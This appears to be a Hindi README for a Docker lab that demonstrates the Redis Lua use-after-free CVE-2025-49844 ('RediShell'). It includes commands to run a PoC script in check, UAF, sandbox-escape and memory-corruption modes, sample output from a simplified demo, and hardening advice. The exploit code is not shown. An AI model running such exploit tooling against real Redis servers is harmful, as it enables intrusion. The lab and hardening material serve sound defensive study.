
शैक्षिक प्रयोगशाला वातावरण जिसमें CVE-2025-49844 (RediShell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट शामिल है, जो Redis Lua इंटरप्रेटर में एक गंभीर use-after-free दोष है, जिसमें Docker सेटअप और भेद्यता विश्लेषण शामिल है।
Redis में गंभीर CVE-2025-49844 (RediShell) भेद्यता के परीक्षण और समझने के लिए एक व्यावहारिक प्रयोगशाला वातावरण।
यह केवल शैक्षिक उद्देश्यों के लिए है!
इनसे पहले के सभी Redis संस्करण:
यह प्रयोगशाला Redis 7.2.0 (भेद्य संस्करण) का उपयोग करती है।
# Docker और Docker Compose स्थापित करें
sudo apt-get update
sudo apt-get install docker.io docker-compose
# Python निर्भरताएँ स्थापित करें
pip install redis colorama
# 1. भेद्य Redis इंस्टेंस प्रारंभ करें
docker-compose up -d
# 2. Redis प्रारंभ होने के लिए कुछ सेकंड प्रतीक्षा करें
sleep 5
# 3. सत्यापित करें कि Redis चल रहा है
docker-compose ps
# 4. एक्सप्लॉइट चलाएँ
python3 exploit_poc.py -H localhost -p 6380 -m all
# केवल भेद्यता जाँचें
python3 exploit_poc.py -H localhost -p 6380 -m check
# बुनियादी UAF परीक्षण चलाएँ
python3 exploit_poc.py -H localhost -p 6380 -m basic
# सैंडबॉक्स एस्केप का परीक्षण करें
python3 exploit_poc.py -H localhost -p 6380 -m sandbox
# उन्नत मेमोरी करप्शन का परीक्षण करें
python3 exploit_poc.py -H localhost -p 6380 -m advanced
# सभी परीक्षण चलाएँ
python3 exploit_poc.py -H localhost -p 6380 -m all
# प्रमाणीकरण के साथ
python3 exploit_poc.py -H localhost -p 6380 -a "password" -m all
# लॉग देखें
docker-compose logs -f
# Redis CLI से कनेक्ट करें
docker-compose exec redis-vulnerable redis-cli
# प्रयोगशाला रोकें
docker-compose down
# सब कुछ हटाएँ (वॉल्यूम सहित)
docker-compose down -v
╔═══════════════════════════════════════════════════════════╗
║ CVE-2025-49844 (RediShell) PoC ║
║ Use-After-Free in Redis Lua Interpreter ║
║ CVSS Score: 10.0 (CRITICAL) ║
╚═══════════════════════════════════════════════════════════╝
[*] Testing connection to localhost:6380...
[+] Connected successfully!
[i] Redis Version: 7.2.0
[*] Checking if Lua scripting is enabled...
[+] Lua scripting is enabled!
[*] Checking vulnerability status...
[i] Detected Redis version: 7.2.0
[!] VULNERABLE: This version is affected by CVE-2025-49844
[!] Update to the latest patched version immediately!
[*] Attempting basic UAF trigger...
[+] Lua script executed: UAF pattern executed
[!] UAF pattern triggered (simplified demo)
[*] Testing Lua sandbox boundaries...
[*] Testing os.execute...
[+] Protected: os.execute blocked
[*] Testing io.popen...
[+] Protected: io.popen blocked
[*] Testing loadfile...
[+] Protected: loadfile blocked
[*] Testing package.loadlib...
[+] Protected: package.loadlib blocked
[*] Attempting memory corruption pattern...
[+] Memory corruption pattern executed: Memory corruption pattern completed
[!] In vulnerable versions, this could lead to RCE!
============================================================
[*] PoC execution completed
============================================================
यह भेद्यता Redis के Lua इंटरप्रेटर में 13 साल पुराने Use-After-Free बग का शोषण करती है:
# नवीनतम पैच किया गया संस्करण खींचें
docker pull redis:8.2.2
# या
docker pull redis:7.4.6
# /etc/redis/redis.conf
# प्रमाणीकरण सक्षम करें
requirepass your_strong_password_here
# नेटवर्क एक्सेस प्रतिबंधित करें
bind 127.0.0.1 ::1
protected-mode yes
# खतरनाक कमांड अक्षम करें
rename-command FLUSHDB ""
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""
rename-command EVALSHA ""
# लॉगिंग सक्षम करें
loglevel notice
logfile /var/log/redis/redis-server.log
# विशिष्ट उपयोगकर्ताओं के लिए Lua स्क्रिप्टिंग अक्षम करें
redis-cli ACL SETUSER myuser -@scripting
# सीमित उपयोगकर्ता बनाएँ
redis-cli ACL SETUSER limited on >password ~* +@read +@write -@scripting
# फ़ायरवॉल नियमों का उपयोग करें
sudo ufw allow from 192.168.1.0/24 to any port 6379
sudo ufw deny 6379
# या iptables का उपयोग करें
sudo iptables -A INPUT -p tcp --dport 6379 -s 192.168.1.0/24 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 6379 -j DROP
# जाँचें कि पोर्ट का उपयोग क्या कर रहा है
sudo lsof -i :6380
# या docker-compose.yml में पोर्ट बदलें
# ports:
# - "6381:6379"
# आवश्यक पैकेज स्थापित करें
pip install redis colorama
# या वर्चुअल वातावरण का उपयोग करें
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
# उपयोगकर्ता को docker समूह में जोड़ें
sudo usermod -aG docker $USER
# फिर लॉगआउट करें और फिर से लॉगिन करें
# लॉग जाँचें
docker-compose logs
# कंटेनर पुनः प्रारंभ करें
docker-compose restart
# इमेज पुनः बनाएँ
docker-compose up -d --build
redis_exploit/
├── Dockerfile # Redis 7.2.0 भेद्य इंस्टेंस
├── docker-compose.yml # Docker Compose कॉन्फ़िगरेशन
├── exploit_poc.py # मुख्य एक्सप्लॉइट स्क्रिप्ट
├── requirements.txt # Python निर्भरताएँ
├── .gitignore # Git इग्नोर फ़ाइल
└── README.md # यह फ़ाइल
यह PoC सरलीकृत है और केवल शैक्षिक उद्देश्यों के लिए है। वास्तविक CVE-2025-49844 एक्सप्लॉइट में जटिल मेमोरी हेरफेर शामिल है। अपने Redis इंस्टेंस को हमेशा नवीनतम संस्करण में पैच करें!